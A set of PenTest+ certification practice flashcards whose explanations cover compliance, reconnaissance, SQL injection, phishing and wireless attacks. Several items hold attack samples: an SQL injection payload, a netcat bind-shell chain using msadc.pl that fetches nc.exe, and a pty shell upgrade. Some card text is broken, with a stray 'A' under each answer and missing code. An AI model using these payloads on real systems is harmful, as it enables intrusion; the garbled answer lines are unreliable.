CompTIA PenTest+ (PT0-001) Practice Certifications Exams (Jason DIon3 of 6) Flashcards

Question 1

Q

Your company is setting up a system to accept credit cards in their retail and online locations. Which of the following compliance types should you be MOST concerned with dealing with credit cards?
A.PCI-DSS
B.GDPR
C.PHI
D.PII

Answer

A

A.PCI-DSS

Explanation:
OBJ-1.4: The Payment Card Industry Data Security Standard (PCI DSS) applies to companies of any size that accept credit card payments. If your company intends to accept card payment and store, process, and transmit cardholder data, you need to securely host your data and follow PCI compliance requirements.

Question 2

Q

A firewall technician configures a firewall to allow HTTP traffic as follows:

-=-=-=-=-=-
Source IP Zone Dest IP Zone Port Action
Any Untrust Any DMZ 80 Allow
-=-=-=-=-=-

The organization should upgrade to what technology to prevent unauthorized traffic from traversing the firewall?
A.Application-aware firewall
B.HTTPS
C.Stateless packet inspection
D.Intrusion detection system

Answer

A

A.Application-aware firewall

Explanation:
OBJ-5.3: Application-aware firewall can analyze and verify protocols all the way up to layer 7 of the OSI reference model. It has the advantage of being aware of the details in the application layer. Since we desired to allow HTTP traffic, we must deal with the traffic at the application layer. This will prevent an attacker from sending SSH traffic over port 80, for example. By using an application-aware firewall, only HTTP traffic will be allowed over port 80.

Question 3

Q

Your organization has been receiving many phishing emails recently, and you are trying to determine why they are effective in getting your users to click on their links. The latest email consists of what looks like an advertisement that is offering an exclusive early access opportunity to buy a new iPhone at a discounted price. Still, there are only 5 phones available at this price. What type of social engineering principle is being exploited here?
A.Trust
B.Familiarity
C.Intimidation
D.Scarcity

Answer

A

D.Scarcity

Explanation:
OBJ-3.1: Scarcity is used to create a fear in a person of missing out on a special deal or offer. This technique is used in advertising all the time, such as “supplies are limited,” “only available for the next 4 hours”, and other such artificial limitations being used.

Question 4

Q

You are performing a web application security test, notice that the site is dynamic, and must be using a back-end database. You decide you want to determine if the site is susceptible to a SQL injection. What is the first character that you should attempt to use in breaking a valid SQL request?
A.Exclamation mark
B.Semicolon
C.Single Quote
D.Double Quote

Answer

A

C.Single Quote

Explanation:
OBJ-3.4: The single quote character (‘) is the character limiter in SQL. With a single quote,’ you delimit strings, and therefore you can test whether the programmer has properly escaped the strings in the targeted application. If not escaped directly, you can end any string supplied to the application and add other SQL code after it. This is a common technique for SQL injections. A semicolon is a commonly used character at the end of a line of code or command in many programming languages. An exclamation mark comments a line of code in several languages. Double quotes contain a string that is passed to a variable.

Question 5

Q

Tierra works as a cybersecurity analyst for a large multi-national oil and gas company. She responds to an incident at her company in which their public-facing web server has been defaced with the words, “Killers of the Arctic.” She believes this was done in response to her company’s latest oil drilling project in the Arctic Circle. Which threat actor is most likely to blame for the website defacement?
A.APT
B.Hacktivist
C.Organized Crime
D.Script Kiddie

Answer

A

B.Hacktivist

Explanation:
OBJ-1.3: It appears this hack was motivated by a pro-environmentalist agenda based on the message of the website defacement. This is an example of hacktivism. In 2012, five top multi-national oil companies were targeted by members of Anonymous as a form of digital protests against drilling in the Arctic, a practice that these hacktivists believe has contributed to the melting of the ice caps in that region.

Question 6

Q

Dion Training has applied a new Group Policy to all student accounts that will lock out any account in which the student enters their password incorrectly 3 times in a row. Once the account is locked out, the student must wait 15 minutes before they can attempt to log in again. What type of attack is this mitigation strategy trying to prevent?
A.Spoofing
B.Privilege Escalation
C.Brute force attack
D.Man-in-the-middle

Answer

A

C.Brute force attack

Explanation:
OBJ-5.3: Since the policy will lockout the student for 15 minutes between attempts, it is a valid mitigation technique against a brute force attack. By extending the waiting period, the attacker’s brute force attempts are less effective.

Question 7

Q

Which of the following is the BEST way to regularly prevent different security threats from occurring within your network?
A.User training and awareness
B.Penetration testing
C.Business COntinuity training
D.Disaster Recovery Planning

Answer

A

A.User training and awareness

Explanation:
OBJ-5.3: Users are the biggest vulnerability on your network. Therefore, increasing user training can decrease the number of security threats that are realized on your networks. According to industry best practices, you should conduct end-user security awareness training at least annually (if not more frequently).

Question 8

Q

During your reconnaissance, you have determined that your client has devices used to send remote control signals to industrial assets used by their critical infrastructure utilities connected to their corporate network. Which of the following methods would MOST likely be the best method for exploiting these systems?
A.Identify a jailbroken device for easy exploitation
B.Use Metasploit modules designed to target the SCADA systems
C.Use social engineering to trick a user into opening a malicious APK
D.Use a spearphishing campaign to trick a user into installing a RAT

Answer

A

B.Use Metasploit modules designed to target the SCADA systems

Explanation:
OBJ-2.5: A penetration tester can exploit supervisory control and data acquisition (SCADA) systems if they are within the engagement’s scope. While Metasploit was initially designed for engagements against workstations and servers, Metasploit has several modules in the exploit/ windows/scada category that target vendor-specific SCADA components running Windows. Many of these trigger a buffer overflow, though, so be careful when using them and ensure you have permission to exploit these devices in your written authorization.

Question 9

Q

During a penetration test, you conduct an exploit that creates a denial of service condition by crashing the httpd server. What should you do?
A.Contact the organizations customer service department and conduct further information gathering
B>Immediately contact the organization and inform them of the issue
C.Continue withj the exploitation
D.Pivot to another machine

Answer

A

B>Immediately contact the organization and inform them of the issue

Explanation:
OBJ-5.4: If at any point during an assessment, an issue arises due to your actions, then you should immediately stop exploitation and contact the trusted point of contact provided by the organization. You should not continue your exploitation or pivot to another machine. While you may contact the organization’s customer service department, you first need to verify if that is part of the allowed communication procedures outlined in the assessment plan. If you are conducting a red team event, the customer service team may be the target and not be informed of the issues directly. As a pentester, you should notify your trusted point of contact within the organization, per your approved test plan.

Question 10

Q

You are working as part of a penetration testing team targeting Dion Training's Linux-based network. You want to determine if you can crack the password on their remote authentication servers. Which of the following tools should you use?
A.Mimikatz
B.W3AF
C.Medusa
D.CeWL

Answer

A

C.Medusa

Explanation:
OBJ-4.2: Medusa is a command-line-based free password cracking tool often used in brute force password attacks on remote authentication servers. W3AF (Web Application Attack and Audit Framework) is a Python tool included in Kali Linux that tries to identify and exploit any web app vulnerabilities. CeWL is a ruby app that crawls websites to generate word lists for use with other password crackers. Mimikatz is an open-source tool that enables you to view credential information stored on Microsoft Windows computers.

Question 11

Q

You are analyzing a Linux server that you suspect has been tampered with by an attacker. You went to the terminal and typed ‘history’ into the prompt and see the output:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> echo 127.0.0.1 diontraining.com&raquo_space; /etc/hosts
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following best describes what actions were performed by this line of code?
A.Added the website to the systems whitelist in the hosts file
B>Routed traffic destined for the localhost to the diontraining.com domain
C.Routed traffic destined for diontraining.com domain to the localhost
D.Attempted to overwrite the host file and deleted all data except this entry

Answer

A

C.Routed traffic destined for diontraining.com domain to the localhost

Explanation:
OBJ-3.5: Based on the output provided, it appears that the attacker has attempted to route all traffic destined for diontraining.com to the IP address specified (127.0.0.1). This is typically done to prevent a system from communicating with a specific domain to redirect a host to a malicious site. In this example, the IP/domain name pair of 127.0.0.1 and diontraining.com is being written to the /etc/hosts file. Modifying your hosts file enables you to override the domain name system (DNS) for a domain on a specific machine. The command echo&raquo_space; redirects the output of the content on the left of the&raquo_space; to the end of the file on the right of the&raquo_space; symbol. If the > were used instead of&raquo_space;, then this command would have overwritten the host file completely with this entry. The hosts file is not a system whitelist file.

Question 12

Q

During a penetration test, which of the following should you perform if your goal is to conduct a successful spear phishing attack?
A.Send targeted emails with a malicious attachment to the sales team
B.Send a targeted email with a malicious attachment to the organizations CEO
C.Send a test message with a malicious link to the organizations executives
D.Call the CTOs assistant using a pretext to gather information about their schedule

Answer

A

A.Send targeted emails with a malicious attachment to the sales team

Explanation:
OBJ-3.1: Spear phishing attacks are crafted to target a specific person or group of people. In this example, you are targeting the sales team with an email. This allows you to create an email that they are more likely to open based on the subject line and its content.

Question 13

Q

Annah is deploying a new application that she received from a vendor, but she is unsure if the hardware is adequate to support a large number of users during peak usage periods. What type of testing could Annah perform to determine if the application will support the required number of users?
A.Regression testing
B>Fuzz testing
C.User acceptance testing
D.Load testing

Answer

A

D.Load testing

Explanation:
OBJ-3.2: Load testing or stress testing puts an application, network, or system under full load conditions to document any performance lapses. User Acceptance Testing is the process of verifying that a created solution/software works for a user. Regression testing is defined as software testing to confirm that a recent program or code change has not adversely affected existing features. Fuzz testing, or fuzzing, is a quality assurance technique used to discover coding errors and security loopholes in software, operating systems, or networks. It involves inputting massive amounts of random data to the test subject to make it crash. User acceptance testing, regression testing, and fuzz testing are not designed to test a system under heavy load conditions. Therefore, they will not be suitable for Annah’s needs in this scenario.

Question 14

Q

You have been contracted to perform a remote scan of Dion Training's servers to determine if they comply with the company's software baseline. Which of the following types of scans should you conduct?
A.Stealth scan
B.Discovery scan
C>Compliance scan
D.Full scan

Answer

A

C>Compliance scan

Explanation:
OBJ-2.2: Compliance scanning verifies that a network adheres to certain policy requirements, such as a corporate baseline. These policies can be corporate, industry, or governmental regulations. In this scenario, you are asked to verify the servers comply with the company’s software baseline. Therefore, a compliance scan is the best option to select.

Question 15

Q

You are working as part of a DevSecOps team at Dion Training on a new practice exam web application. Which of the following tools should you utilize to scan the web application's database to determine if it is vulnerable to injection flaws?
A.SQLMap
B.Dirbuster
C>Theharvester
D.Kismet

Answer

A

A.SQLMap

Explanation:
OBJ-4.2: SQLmap is an open-source database scanner that searches for and exploits SQL injection flaws. This tool is included by default within Kali Linux. Dirbuster, Kismet, and Theharvester are not tools for conducting SQL vulnerability scans. Dirbuster is a brute force tool included with Kali Linux that exposes directories and file names on web and application servers. Kismet is an 802.11 Layer 2 wireless network detector, sniffer, and intrusion detection system included with Kali Linux that monitors wireless activity, identifies device types, and captures raw packets for later password cracking. Theharvester is an open-source intelligence tool (OSINT) that gathers information such as email addresses, subdomains, hostnames, open ports, and banners from publicly available sources.

Question 16

Q

You are analyzing a Python script that isn’t functioning properly. You suspect the issue is with the string manipulation being used in the code. Review the following Python code snippet:

-=-=-=-=-=-
#!/usr/bin/python
s = "DionTraining.com"
print(s[-12:-7])
-=-=-=-=-=-

Based on your analysis, what should be displayed on the screen by the print command?
A.Train
B.nTrai
C.oc..g
D.moc

Answer

A

A.Train

Explanation:
OBJ-4.4: When evaluating the code s[-12:-7], you would receive “Train” in response. Within Python, characters in a string can be accessed by their index location. If the string (s) is “DionTraining.com”, then each letter from left to right is referenced as s[0] to s[15]. If you want to reference it from right to left, you simply use a negative number, such as s[-12:-7]. The format for the array is [start:end:increment], so s[-12:-7] is evaluated as starting with the 12th position from the right (T in DionTraining.com), count until it reaches the 7th position from the right, incrementing by the default value of 1 each time. This would display, from the end of the word, the 12th position (T), 11th position (i), 10th position (o), 9th position (i), and 8th position (T), and then stop. Note that when counting positions from the right, you begin counting at 1. When counting from the left, you start with position 0 and work up from there.

Question 17

Q

While conducting a penetration test against an organization, you gained access to the CEO’s account. You log in as the CEO and send the following email:

-=-=-=-=-=-=-
Subject: URGENT - Payment Required

Date: December 3, 2020 12:43 pm

From: “Jason Dion - CEO”
To: “Cristian Santiago - Financial Analyst”
Attachment: WiringInstructions.pdf

Cristian,

Please find the attached wiring instruction for the $15,425 payment to the cloud hosting provider.

This bill is showing as overdue, and payment MUST be transferred today. Please process ASAP.

Thanks,
Jason Dion, CEO
Dion Training Solutions, LLC
-=-=-=-=-=-=-

Which of the following attacks are you utilizing in this scenario?
A.BEC Attack
B.Deauthentication attack
C.WHaling attack
D.SMishing Attack

Answer

A

A.BEC Attack

Explanation:
OBJ-3.1: A business email compromise (BEC) is a form of elicitation where the attacker impersonates a high-level executive or directly takes over their email account. The attacker then sends an email to elicit personnel to take actions on their behalf. In this example, the attacker is impersonating the company’s CEO by sending an email to the financial personnel requesting they send a money transfer for what appears to be a legitimate service. This example also uses the urgency and authority motivation factors to convince the employee to take action.

Question 18

Q

A malicious user is blocking mobile devices from connecting to the Internet when other people are in the coffee shop. What is the malicious user performing?
A.SPoofing
B.Frequency jamming
B.Blacklisting IP addresses in the ACL
D.Man-in-the-Middle attack

Answer

A

B.Frequency jamming

Explanation:
OBJ-3.3: Frequency jamming is one of the many exploits used to compromise a wireless environment. It works by denying service to authorized users as legitimate traffic is jammed by the overwhelming frequencies of illegitimate traffic. There is no indication that the malicious user is creating a rogue AP (which is a form of spoofing) or performing a MITM attack by having users connect through their laptop or device. Also, there is no mention of certain websites or devices being blocked logically. Therefore there is no blacklisting of IP addresses performed.

Question 19

Q

Which of the following is the MOST important thing to receive from the client during the planning for an engagement?
A.Key management policies
B.Storage time for a report
C.TOlerance to impact
D.On-site versus off-site targets

Answer

A

C.TOlerance to impact

Explanation:
OBJ-1.3: The client’s tolerance to impact will allow the penetration test to balance the tasks to be performed in the assessment against real-world network utilization. If the client has a low tolerance to impact, then the assessment may be conducted on a cloned or a sandboxed version of the network or its applications. If the client has a high tolerance to impact, then they understand and agree that the penetration test may have real-world consequences to the production network during the assessment. This is usually based on the organization’s risk appetite.

Question 20

Q

A company has had several virus infections over the past few months. The cause was vulnerabilities in the software applications in use. What should an administrator implement to prevent future outbreaks?
A.Host-based intrusion detection systems
B.Patch management
C>Incident response team
D.Acceptable use policies

Answer

A

B.Patch management

Explanation:
OBJ-5.3: Since the viruses exploited known vulnerabilities, there should be patches available from the manufacturer/vendor. Based on this, proper patch management would prevent future outbreaks.

Question 21

Q

Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization's database?
A.Cross-site scripting
B>SQL Injection
C.Denial of service
D.Buffer overflow

Answer

A

B>SQL Injection

Explanation:
OBJ-3.4: A SQL injection poses the most direct and more impactful threat to an organization’s database. A SQL injection could allow the attacker to execute remote commands on the database server and lead to sensitive information disclosure. A buffer overflow attack attempts to overwrite the memory buffer to send additional data into adjacent memory locations. A buffer overflow attack might target a database server, but it isn’t intended to disclose information directly. Instead, a buffer overflow attack may be used to gain initial access to a server and allow for other malicious code running. A denial of service targets the availability of the information by attempting to take the server offline. A cross-site scripting attack typically is focused on the user, not the server or database.

Question 22

Q

Windows file servers commonly hold sensitive files, databases, passwords, and more. What common vulnerability is usually used against a Windows file server to expose sensitive files, databases, and passwords?
A.SQL Injection
B>Cross-site scripting
C.MIssing patches
D.CRLF Injection

Answer

A

C.MIssing patches

Explanation:
OBJ-2.3: Missing patches are the most common vulnerability found on both Windows and Linux systems. When a security patch is released, attackers begin to reverse engineer the security patch to exploit the vulnerability. If your servers are not patched against the vulnerability, they can become victims of the exploit, and the server’s data can become compromised. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. Cross-site scripting focuses on exploiting a user’s workstation, not a server. CRLF injection is a software application coding vulnerability that occurs when an attacker injects a CRLF character sequence where it is not expected. SQL injection is the placement of malicious code in SQL statements via web page input. SQL is commonly used against databases, but they are not useful when attacking file servers.

Question 23

Q

You are conducting a wireless penetration test against an organization. During your reconnaissance, you discover that their network is known as "BigCorpWireless" has its SSID broadcast is enabled. You configure your laptop to respond to requests for connection to "BigCorpWireless" and park at the far end of the parking lot. At the end of the workday, as people get in their cars in the parking lot, you see numerous smartphones connecting to your laptop over WiFi. Which of the following exploits did you utilize?
A.Downgrade attack
B.Fragmentation attack
C.Deauthentication attack
D.Karma Attack

Answer

A

D.Karma Attack

Explanation:
OBJ-3.3: A karma attack is a variant of the evil twin attack. A karma attack exploits the behavior of a wireless client trying to connect to its preferred network list. This list contains the SSIDs of access points the device has connected to in the past. When a wireless device is looking to connect to the internet, it firsts beacons to determine if any of these previously connected to networks are within range. This allows an attacker to answer the request, allowing the user to connect to them instead as an evil twin. At this point, the attacker is now the man-in-the-middle between the wireless client and the internet, which is useful for many different exploits.

Question 24

Q

You have been contracted by Dion Training to conduct a penetration test against its learning management system (LMS). The LMS is a web application that is hosted in the organization's DMZ. Which of the following appliances should the organization whitelist your source IP in before the engagement begins?
A.NIDS
B.HIDS
C.DLP
D.WAF

Answer

A

D.WAF

Explanation:
OBJ-1.3: Whitelisting allows the IP address to be excluded from ACL rules and other signatures. This prevents an active device, like a web application firewall (WAF), layer 4 firewall, or an intrusion protection system (IPS) from blocking the penetration tester during the assessment. By having your IP added to the whitelist, you can focus your time and efforts on finding vulnerabilities with the servers themselves instead of trying to break through a compensating control like a WAF or IPS.

Question 25

Q

The physical security manager has asked you to assist with his risk assessment of his proposed security measures. He is concerned that during a power outage, the server room might be targeted for attack. Luckily, he has many different protection measures in place to keep intruders out of the server room. During a power outage, which of the following security controls would still be usable?
A.Biometric scanners
B.Door locks
C.Motion detectors
D.CCTV

Answer

A

B.Door locks

Explanation:
OBJ-3.6: A traditional door lock doesn’t require power to operate. Therefore, it will still protect the facility and keep the intruder out of the server room. The other options all require power to function and operate.

Question 26

Q

What techniques are commonly used by port and vulnerability scanners to identify the services running on a target system?
A.Banner grabbing and UDP response timing
B.Banner grabbing and comparing response fingerprints
C.Using the -O option in nmap and UDP response timing
D.COmparing response fingerprinting and registry scanning

Answer

A

B.Banner grabbing and comparing response fingerprints

Explanation:
OBJ-2.1: Service and version identification are often performed by conducting a banner grab or by checking responses for services to known fingerprints for those services. UDP response timing and other TCP/IP stack fingerprinting techniques are used to identify operating systems only. Using nmap -O will conduct an operating system fingerprint scan, but it will not identify the other services being run.

Question 27

Q

What programming language is most vulnerable to buffer overflow attacks?
A.Swift
B.Python
C.C++
D.Java

Answer

A

C.C++

Explanation:
OBJ-3.4: Many memory manipulation functions in C and C++ do not perform bounds checking and can easily overwrite the allocated bounds of the buffers they operate upon. Newer languages like Python, Java, and Swift do a better job of protecting against a buffer overflow, but even they are not perfect.

Question 28

Q

While conducting a static analysis source code review of a program, you see the following line of code:

-=-=-=-=-=-=-
String query = “SELECT * FROM CUSTOMER WHERE CUST_ID=’” + request.getParameter(“id”) + “’”;
-=-=-=-=-=-=-

What is the issue with the largest security issue with this line of code?
A.The * operator will allow retrieval of every data field about this customer in the CUSTOMER table
B.The code is using parameterized queries
C.A SQL injection could occur because input validation is not being used on the id parameter
D.This code is vulnerable to a buffer overflow attack

Answer

A

C.A SQL injection could occur because input validation is not being used on the id parameter

Explanation:
OBJ-5.3: This code takes the input of “id” directly from a user or other program without conducting any input validation. This could be exploited and used as an attack vector for an SQL injection. If a malicious user can alter the ID source, it might get replaced with something like’ or ‘1’ =’1. This will cause the SQL statement to become: “SELECT * FROM CUSTOMER WHERE CUST_ID=’’ or ‘1’=’1’”. Because ‘1’ always equals ‘1’, the where clause will always return ‘true,’ meaning that EVERY record in the database could now become available to the attacker. When creating SQL statements, there are reasons for and against the use of the * operator. Its presence alone does not necessarily indicate a weakness. With only one line of code being reviewed, you cannot make any statement about whether it is vulnerable to a buffer overflow attack. You do not see the declaration values for the initialization of the id variable. This code is not using parameterized queries, but if it did, then it would eliminate this vulnerability. A parameterized query is a type of output encoding that relies on prepared statements to reduce the risk of an SQL injection

Question 29

Q

A security analyst is conducting a log review of the company’s web server and found two suspicious entries:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[12Nov2020 10:07:23] “GET /logon.php?user=test’+oR+7>1%20—HTTP/1.1” 200 5825
[12Nov2020 10:10:03] “GET /logon.php?user=admin’;%20—HTT{/1.1” 200 5845
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

The analyst contacts the web developer and asks for a copy of the source code to the logon.php script. The script is as follows:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on source code analysis, which type of vulnerability is this web server vulnerable to?
A.Command injection
B.Directory traversal
C.LDAP Injection
D.SQL Injection

Answer

A

D.SQL Injection

Explanation:
OBJ-3.4: Based on the log entries, it appears the attack was successful in conducting a SQL injection. Notice the escape character (‘) used in the log. A connection to the MySQL database is being used in the script, which could be exploited since no input validation is being performed. Command injection is an attack in which the goal is to execute arbitrary commands on the host operating system via a vulnerable application. SQL injection is a specific type of command injection. LDAP injection is a code injection technique used to exploit web applications that could reveal sensitive user information or modify information represented in the LDAP (Lightweight Directory Access Protocol) data stores. Directory traversal or Path Traversal is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server’s root directory.

Question 30

Q

You have been tasked to create some baseline system images to remediate vulnerabilities found in different operating systems. Before any of the images can be deployed, they must be scanned for malware and vulnerabilities. You must ensure the configurations meet industry-standard benchmarks and that the baselining creation process can be repeated frequently. What vulnerability option would BEST create the process requirements to meet the industry-standard benchmarks?
A.Utilizing an operating system SCAP plugin
B.Utilizing a non-credential scan
C.Utilizing an authorized credential scan
D.Utilizing a known malware plugin

Answer

A

A.Utilizing an operating system SCAP plugin

Explanaition:
OBJ-2.2: Security Content Automation Protocol (SCAP) is a multi-purpose framework of specifications supporting automated configuration, vulnerability and patch checking, technical control compliance activities, and security measurement. It is an industry-standard and support testing for compliance. The other options will not allow for a truly repeatable process since individual scans would occur each time instead of comparing against a known good baseline.

Question 31

Q

What should a vulnerability report include if a cybersecurity analyst wants it to reflect the assets scanned accurately?
A.Organized governance
B.Processor utilization
C.Virtual hosts
D.Log disposition

Answer

A

C.Virtual hosts

Explanation:
OBJ-2.2: Vulnerability reports should include both the physical hosts and the virtual hosts on the target network. A common mistake of new cybersecurity analysts is to include physical hosts, thereby missing many network assets.

Question 32

Q

Which of the following types of encryption would ensure the best security of a website?
A.TLS
B.SSLv1
C.SSLv3
D.SSLv2

Answer

A

A.TLS

Explanation:
OBJ-5.3: Transport Layer Security (TLS) is a widely adopted security protocol designed to facilitate privacy and data security for communications over the internet. A primary use case of TLS is encrypting the communication between web applications and servers, such as web browsers loading a website. TLS was developed in 1999 as SSLv3.1, but its name was changed to separate itself from Netscape, who developed the original SSL protocol. Because of this history, the terms TLS and SSL are often used interchangeably. Secure Socket Layer uses three versions: SSLv1, SSLv2, and SSLv3. All of these versions of SSL are considered obsolete and insecure.

Question 33

Q

You are analyzing the vulnerability scanning results from a recent web vulnerability scan in preparation for the exploitation phase of an upcoming assessment. A portion of the scan results is shown below.
Which exploit is the website vulnerable to based on the results?
A.Cookie manipulation
B.SQL Injection
C.Local file inclusion
D.XSS

Answer

A

D.XSS

Explanation:
OBJ-2.3: Cross-site scripting exploits a vulnerability with a malicious script injected into a trusted website and then downloaded and executed by a user’s browser. In this scan result, you can see that the parameter for the name that was posted included some javascript (onload, this.src). This result shows that this site is vulnerable to a cross-site scripting attack.

Question 34

Q

You are working as part of a penetration testing team targeting Dion Training’s webserver. You want to determine if you can expose any directories or file names on the webserver. Which of the following tools should you use?

A.Mimikatz
B.Dirbuster
C.IDA
D.CeWL

Answer

A

B.Dirbuster

Explanation:
OBJ-4.2: Dirbuster uses brute force to expose directories and file names on web and application servers. CeWL is a ruby app that crawls websites to generate word lists for use with other password crackers. Mimikatz is an open-source tool that enables you to view credential information stored on Microsoft Windows computers. IDA (Interactive Disassembler) is a reverse-engineering tool that generates source code from machine code for Windows, Mac OS X, and Linux applications.

Question 35

Q

Tamera is conducting a penetration test of Dion Training’s network. She just successfully exploited a Linux server and then entered the following command:

-=-=-=-=-=-
python -c ‘import pty; pty.spawn(“/bin/bash”)’
-=-=-=-=-=-

Which of the following techniques is Tamera utilizing?
A.Creating a scheduled task
B.Credential harvesting
C.Shell upgrade
D.Erasing shell history

Answer

A

C.Shell upgrade

Explanation:
OBJ-3.5: When running an exploit, sometimes you don’t receive a fully interactive shell in return. If you receive a “dumb shell”, you can use Python to spawn a pty. A pty is a pseudo-terminal utility that is built into Python and only works on Linux systems. From here, you can attempt a privilege escalation using su and other commands on the system.

Question 36

Q

A penetration tester is conducting software assurance testing on a web application for Dion Training. You discover the web application is vulnerable to an SQL injection and could disclose a regular user’s password. Which of the following actions should you perform?
A.Document the finding with an executive summary, methodology used, and a remediation recommendation
B.Contact the development team directly and recommend adding input validation to the web application
C.Recommend that the company conduct a full penetration test of their systems to identify other vulnerabilities
D.Conduct a proof-of-concept exploit on three user accounts at random and document this in your report

Answer

A

A.Document the finding with an executive summary, methodology used, and a remediation recommendation (This is potentially not true as a SQL Injection is considered critical therefore you should contact point of contact in communication escalation path)

Explanation:
OBJ-5.1: When you find a vulnerability, it should be documented fully. This includes providing an executive summary for management, the methodology used to find the vulnerability so that others can recreate and verify it, and the recommendation remediation actions that should be taken. You should not exploit three random accounts on the server, which could negatively impact the client’s reputation. You should not contact the development team directly since they may ignore your recommendation, and they did not hire you. While it may be a good idea to conduct a full-scale penetration test, that would not necessarily solve this vulnerability.

Question 37

Q

Ryan needs to verify the installation of a critical Windows patch on his organization’s workstations. Which method would be the most efficient to validate the current patch status for all of the organization’s Windows 10 workstations?
A.Create and run a PowerShell script to search for the specific patch in question
B.Check the update history manually
C.Conduct a registry scan of each workstation to validate the patch was installed
D.Use SCCM to validate patch status for each machine on the domain

Answer

A

D.Use SCCM to validate patch status for each machine on the domain

Explanation:
OBJ-5.3: The Microsoft System Center Configuration Manager (SCCM) provides remote control, patch management, software distribution, operating system deployment, network access protection, and hardware and software inventory. In an Azure environment, you can also use the Update Compliance tool to monitor your device’s Windows updates, Windows Defender anti-virus status, and the up to date patching status across all of your Windows 10 workstations. In previous Windows versions, you could use the Microsoft Baseline Analyzer (MSBA), but that is no longer supported when Windows 10 was introduced. A PowerShell script may be a reasonable option, but it would take a knowledgeable analyst to create the script and scan the network, whereas using SCCM is easier and quicker. Manually checking the Update History or registry of each system could also work, but that is very time consuming and inefficient, especially if Ryan is supporting a large network.

Question 38

Q

Which of the following types of information is protected by rules in the United States that specify the minimum frequency of vulnerability scanning required for devices that process it?
A.Insurance records
B.Credit card data
C.Medical records
D.Drivers license numbers

Answer

A

B.Credit card data

Explanation:
OBJ-1.4: The Payment Card Industry Data Security Standard is an information security standard for organizations that handle branded credit cards from the major card schemes. The PCI Standard is mandated by the card brands but administered by the Payment Card Industry Security Standards Council. As part of PCI DSS compliance, organizations must conduct internal and external scans at prescribed intervals on any devices or systems that process credit card data. HIPPA protects medical and insurance records, but this law doesn’t define a frequency for vulnerability scanning requirements. Driver’s license numbers are considered PII, but again, there is no defined frequency scanning requirement regarding protecting PII under law, regulation, or rule.

Question 39

Q

Which file on a Linux system is modified to set the maximum number of days before a password must be changed?
A./etc/shadow
B./etc/users
C./etc/groups
D./etc/passwd

Answer

A

A./etc/shadow

Explanation:
OBJ-3.5: The /etc/shadow file stores the actual password in an encrypted format (more like the hash of the password) for the user’s account with additional properties related to the user password. Basically, it stores secure user account information. All fields are separated by a colon (:) symbol. It contains one entry per line for each user listed in the /etc/passwd file. The last 6 fields provide password aging and account lockout features.

Question 40

Q

Your organization is preparing for its required quarterly PCI DSS external vulnerability scan. Who is authorized to perform this scan?
A.Only employees of the company
B.Only an approved scanning vendor
C.Any qualified individual
D.Anyone

Answer

A

B.Only an approved scanning vendor

Explanation:
OBJ-1.4: The Payment Card Industry Data Security Standard (PCI DSS) is a prescriptive framework. It is not a law but a formal policy created by the credit card industry that organizations must follow to accept credit and bank cards for payment. Quarterly required external vulnerability scans must be run by a PCI DSS approved scanning vendor (ASV). This question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!

Question 41

Q

What nmap switch would you use to perform operating system detection?
A.-OS
B.-s0
C.-O
D.-sP

Answer

A

C.-O

Explanation:
OBJ-4.1: The –O switch is used to tell nmap to conduct fingerprinting of the operating system based on the responses received during scanning. Nmap will then report on the suspected operating system of the scanned host. If you use –O –v, you will get additional details, as this runs the operating system scan in verbose mode. The -OS flag is made up and not supported by nmap. The -s0 flag conducts an IP protocol scan of the target. The -sP flag conducts a simple ping scan against the target.

Question 42

Q

A company-wide audit revealed employees are using company laptops and desktops for personal use. To prevent this from occurring, in which document should the company incorporate the phrase “Company-owned IT assets are to be used to perform authorized company business only"?
A.MOU
B.AUP
C.SLA
D.MSA

Answer

A

B.AUP

Explanation:
OBJ-1.2: Acceptable Use Policy dictates what types of actions an employee can or cannot do with company-issued IT equipment.

Question 43

Q

A penetration tester discovered a web server running IIS 4.0 during their enumeration phase. The tester decided to use the msadc.pl attack script to execute arbitrary commands on the webserver. While the msadc.pl script is effective, and the pentester found it too monotonous to perform extended functions. During further research, the penetration tester found a Perl script that runs the following msadc commands:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
system(“perl msadc.pl -h $host -C "echo $user»tempfile"”);
system(“perl msadc.pl -h $host -C "echo $pass»tempfile"”);
system(“perl msadc.pl -h $host -C "echo bin»tempfile"”);
system(“perl msadc.pl -h $host -C "echo get nc.exe»tempfile"”);
system(“perl msadc.pl -h $host -C "echo get hacked.html»tempfile"”);
(“perl msadc.pl -h $host -C "echo quit»tempfile"”);
system(“perl msadc.pl -h $host -C "ftp -s:tempfile"”);
$o=; print “Opening FTP connection…\n”;
system(“perl msadc.pl -h $host -C "nc -l -p $port -e cmd.exe"”);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which exploit type is indicated by this script?
A.SQL Injection Exploit
B.Denial of Service exploit
C.Chained exploit
D.Buffer overflow exploit

Answer

A

C.Chained exploit

Explanation:
OBJ-2.4: The script is an example of a chained exploit because it combines several programs into one, including writing to a temporary file, netcat usage, and FTP usage. Chained exploits integrate more than one form of attack to accomplish their goal. A buffer overflow is an anomaly where a program that occurs while writing data to a buffer overruns the buffer’s boundary and overwrites adjacent memory locations. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor’s actions

Question 44

Q

